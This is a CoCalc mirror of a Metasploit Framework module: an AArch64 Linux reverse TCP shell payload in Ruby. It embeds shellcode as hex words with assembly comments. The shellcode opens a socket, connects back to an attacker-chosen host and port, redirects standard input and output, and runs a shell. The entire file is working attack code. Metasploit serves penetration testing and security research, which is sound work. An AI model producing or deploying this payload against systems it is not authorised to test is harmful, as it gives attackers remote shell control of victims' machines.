CoCalc -- shell_reverse

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb
¹⁹⁵⁹³ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = 152
8

9
  include Msf::Payload::Single
10
  include Msf::Payload::Linux::Aarch64::Prepends
11
  include Msf::Sessions::CommandShellOptions
12

13
  def initialize(info = {})
14
    super(
15
      merge_info(
16
        info,
17
        'Name' => 'Linux Command Shell, Reverse TCP Inline',
18
        'Description' => 'Connect back to attacker and spawn a command shell',
19
        'License' => MSF_LICENSE,
20
        'Platform' => 'linux',
21
        'Arch' => ARCH_AARCH64,
22
        'Handler' => Msf::Handler::ReverseTcp,
23
        'Session' => Msf::Sessions::CommandShellUnix,
24
        'Payload' => {
25
          'Offsets' =>
26
            {
27
              'LHOST' => [ 132, 'ADDR' ],
28
              'LPORT' => [ 130, 'n' ]
29
            },
30
          'Payload' =>
31
                    [
32
                      # Generated from external/source/shellcode/linux/aarch64/single_reverse_tcp_shell.s
33
                      0xd2800040, #  mov	x0, #0x2                   	// #2
34
                      0xd2800021,          #  mov	x1, #0x1                   	// #1
35
                      0xd2800002,          #  mov	x2, #0x0                   	// #0
36
                      0xd28018c8,          #  mov	x8, #0xc6                  	// #198
37
                      0xd4000001,          #  svc	#0x0
38
                      0xaa0003e3,          #  mov	x3, x0
39
                      0x10000341,          #  adr	x1, 80 <sockaddr>
40
                      0xd2800202,          #  mov	x2, #0x10                  	// #16
41
                      0xd2801968,          #  mov	x8, #0xcb                  	// #203
42
                      0xd4000001,          #  svc	#0x0
43
                      0x35000260,          #  cbnz	w0, 74 <exit>
44
                      0xaa0303e0,          #  mov	x0, x3
45
                      0xd2800002,          #  mov	x2, #0x0                   	// #0
46
                      0xd2800001,          #  mov	x1, #0x0                   	// #0
47
                      0xd2800308,          #  mov	x8, #0x18                  	// #24
48
                      0xd4000001,          #  svc	#0x0
49
                      0xd2800021,          #  mov	x1, #0x1                   	// #1
50
                      0xd2800308,          #  mov	x8, #0x18                  	// #24
51
                      0xd4000001,          #  svc	#0x0
52
                      0xd2800041,          #  mov	x1, #0x2                   	// #2
53
                      0xd2800308,          #  mov	x8, #0x18                  	// #24
54
                      0xd4000001,          #  svc	#0x0
55
                      0x10000180,          #  adr	x0, 88 <shell>
56
                      0xd2800002,          #  mov	x2, #0x0                   	// #0
57
                      0xf90003e0,          #  str	x0, [sp]
58
                      0xf90007e2,          #  str	x2, [sp,#8]
59
                      0x910003e1,          #  mov	x1, sp
60
                      0xd2801ba8,          #  mov	x8, #0xdd                  	// #221
61
                      0xd4000001,          #  svc	#0x0
62
                      0xd2800000,          #  mov	x0, #0x0                   	// #0
63
                      0xd2800ba8,          #  mov	x8, #0x5d                  	// #93
64
                      0xd4000001,          #  svc	#0x0
65
                      0x5c110002,          #  .word	0x5c110002
66
                      0x0100007f,          #  .word	0x0100007f
67
                      0x00000000,          #  .word	0x00000000                // shell
68
                      0x00000000,          #  .word	0x00000000
69
                      0x00000000,          #  .word	0x00000000
70
                      0x00000000,          #  .word	0x00000000
71
                    ].pack('V*')
72
        }
73
      )
74
    )
75

76
    # Register command execution options
77
    register_options(
78
      [
79
        OptString.new('SHELL', [ true, 'The shell to execute.', '/bin/sh' ]),
80
      ]
81
    )
82
  end
83

84
  def generate(_opts = {})
85
    p = super
86

87
    sh = datastore['SHELL']
88
    if sh.length >= 16
89
      raise ArgumentError, 'The specified shell must be less than 16 bytes.'
90
    end
91

92
    p[136, sh.length] = sh
93

94
    p
95
  end
96
end
97

98
Product

Resources

Company
